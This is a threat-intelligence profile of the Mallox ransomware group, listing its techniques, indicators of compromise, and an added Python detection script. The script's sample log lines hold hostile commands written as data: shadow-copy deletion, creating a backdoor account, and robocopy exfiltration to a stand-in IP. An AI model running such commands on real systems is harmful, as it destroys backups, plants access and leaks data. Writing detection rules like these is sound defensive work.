Dark Web Profile: Mallox Ransomware – SOCRadar® Cyber Intelligence Inc.

Mallox is a ransomware strain and group, active since mid-2021, known for multi-extortion and data leaks on its Tor-based site, with activity continuing into 2024. The operation targets multiple sectors worldwide and employs a broad attack lifecycle, from initial access through ransom negotiation to data publication. #Mallox #TargetCompany #Tohnichi #Fargo #MalloxDataLeak

Key points

  • Mallox operates under several aliases (TargetCompany, Tohnichi, Fargo) and has sustained activity since 2021, including 2024 attacks.
  • The gang pursues multi-extortion, encrypting data and threatening public data leaks via its own data-leak site.
  • Initial access combines exploitation of public-facing vulnerabilities (CVE-2019-1068, CVE-2020-0618), brute-force attacks, and phishing that delivers frameworks such as Cobalt Strike and Sliver.
  • Persistence and privilege escalation rely on AnyDesk for remote access and Mimikatz for credential dumping; backdoor accounts are created for re-entry.
  • Network reconnaissance with netscan.exe and lateral movement using custom scripts and stolen tokens expand infection to additional hosts.
  • Data is exfiltrated with Robocopy and PowerShell; files are encrypted with AES-256/RSA-2048, and shadow copies are deleted to hinder recovery.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Mallox exploited unpatched RCE vulnerabilities in MS-SQL Server and ODBC interfaces. Quote: ‘Exploiting vulnerabilities in publicly exposed services such as MS-SQL and ODBC interfaces.’
  • [T1566.001] Phishing – Phishing emails with malicious attachments or links to deliver attack frameworks like Cobalt Strike and Sliver. Quote: ‘phishing emails with malicious attachments or links to deliver attack frameworks like Cobalt Strike and Sliver helps establish initial access.’
  • [T1110] Brute Force – Brute-force attacks against weakly configured services accessible over the internet. Quote: ‘Conducting brute-force attacks against weakly configured services and applications accessible over the internet.’
  • [T1021] Remote Services – Installing legitimate remote desktop software like AnyDesk to maintain access. Quote: ‘Installing legitimate remote desktop software like AnyDesk to maintain access without relying solely on malware…’
  • [T1136] Create Account – Creating backdoor accounts and scripts for persistent access. Quote: ‘Creating backdoor accounts and scripts for persistent access allows the threat actors to re-enter the system…’
  • [T1003] Credential Dumping – Using Mimikatz to dump credentials from memory. Quote: ‘Using tools like Mimikatz to dump credentials and extract plaintext passwords from memory…’
  • [T1046] Network Service Scanning – Using netscan.exe to map the network and enumerate targets. Quote: ‘Utilizing legitimate network scanning tools like netscan.exe to map out the network topology, identify active hosts…’
  • [T1021] Lateral Movement – Creating and using custom scripts/tools to move laterally; using stolen tokens. Quote: ‘Creating and using custom scripts or tools to move laterally across the network…’
  • [T1041] Exfiltration – Copying data to external servers using Robocopy/PowerShell; data can be compressed/encrypted prior to exfiltration. Quote: ‘Using command-line utilities like Robocopy or PowerShell scripts to copy sensitive data…’
  • [T1486] Data Encrypted for Impact – Encrypting files with AES-256/RSA-2048 across formats. Quote: ‘Strong encryption algorithms like AES-256 or RSA-2048 can be used to encrypt files…’
  • [T1490] Inhibit System Recovery – Deleting shadow copies to prevent recovery. Quote: ‘Shadow copies are backups created by Windows to allow users to restore previous versions of files. By deleting these shadow copies…’
  • [T1560] Archive Collected Data – Compressing data before exfiltration to hinder detection. Quote: ‘file compression tools… to compress and encrypt exfiltrated data makes it harder for defenders to detect or recover.’
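As an added illustration of turning the listed techniques into detection logic (example code written for this summary, not SOCRadar's or the report's own code): the script runs one rule per technique over constructed process-creation log lines and groups hits per account, so a single account that triggers several of the profile's techniques stands out from a one-off admin task. The log format, the account names and the concrete commands assumed for T1490, T1136 and T1041 (vssadmin shadow deletion, net user /add, Robocopy to a UNC path) are assumptions, not quoted from the report.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (not from the SOCRadar report),
# one per line as "user|parent_image|image|command_line".
SAMPLE_EVENTS = """\
svc_sql|sqlservr.exe|cmd.exe|cmd.exe /c whoami
svc_sql|cmd.exe|netscan.exe|netscan.exe /range:10.0.0.0/24
svc_sql|cmd.exe|vssadmin.exe|vssadmin.exe delete shadows /all /quiet
svc_sql|powershell.exe|robocopy.exe|robocopy.exe D:\\finance \\\\203.0.113.5\\drop /E /Z
svc_sql|cmd.exe|net.exe|net user backup_svc Passw0rd! /add
jdoe|explorer.exe|notepad.exe|notepad.exe notes.txt
jdoe|explorer.exe|robocopy.exe|robocopy.exe C:\\docs D:\\backup /E
"""
# One predicate per technique the profile lists; the concrete commands (vssadmin,
# net user, UNC-path robocopy) are assumed typical forms, not quoted from the report.
RULES = [
    ("T1190", lambda e: e["parent"] == "sqlservr.exe"  # MS-SQL process spawning a shell
                        and e["image"] in {"cmd.exe", "powershell.exe"}),
    ("T1046", lambda e: e["image"] == "netscan.exe"),  # scanning tool named in the profile
    ("T1490", lambda e: bool(re.search(r"vssadmin(\.exe)?\s+delete\s+shadows", e["cmd"], re.I))),
    ("T1041", lambda e: e["image"] == "robocopy.exe"  # copy to a UNC (\\host\share) destination
                        and bool(re.search(r"\\\\\S+", e["cmd"]))),
    ("T1136", lambda e: bool(re.search(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", e["cmd"], re.I))),
]

def parse_events(text):
    """Split the pipe-delimited log into dicts; image names are lower-cased for matching."""
    events = []
    for line in text.splitlines():
        if line.strip():
            user, parent, image, cmd = line.split("|", 3)
            events.append({"user": user, "parent": parent.lower(), "image": image.lower(), "cmd": cmd})
    return events

def detect(events):
    """Return one (user, technique_id, command_line) tuple per rule hit."""
    return [(e["user"], tid, e["cmd"]) for e in events for tid, pred in RULES if pred(e)]

def intrusion_chains(hits, min_techniques=3):
    """Accounts whose activity spans several listed techniques: the lifecycle, not a one-off task."""
    per_user = defaultdict(set)
    for user, tid, _ in hits:
        per_user[user].add(tid)
    return {u: sorted(t) for u, t in per_user.items() if len(t) >= min_techniques}

if __name__ == "__main__":
    hits = detect(parse_events(SAMPLE_EVENTS))
    print(*hits, sep="\n")
    print("chains:", intrusion_chains(hits))
```

Only the svc_sql account, whose commands span five of the listed techniques, is reported as a chain; jdoe's local Robocopy backup produces no hit.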

Indicators of Compromise

  • [Domain] pixeldrain[.]com – example of a file-hosting service used to publish leaked data. Context: ‘The uploaded file was viewed only 29 times and downloaded 6 times… uploaded to data leak sites.’
  • [File name] HOW TO BACK FILES.txt – context: ‘Mallox drops countless HOW TO BACK FILES.txt’ (Any.run report).
  • [CVE] CVE-2019-1068; [CVE] CVE-2020-0618 – context: ‘RCE vulnerabilities in Microsoft SQL Server’ and targeted versions.
  • [IP Address] Russia-based IP address (not specified in the summary) – context: ‘latest uploaded sample makes contact with a Russia-based IP address’ (JoeSandbox).
  • [File] Encrypted files with Mallox extension and target file types (documents, images, videos, databases, archives) – context: ‘Encrypting files across a wide range of formats…’

Read more: https://socradar.io/dark-web-profile-mallox-ransomware/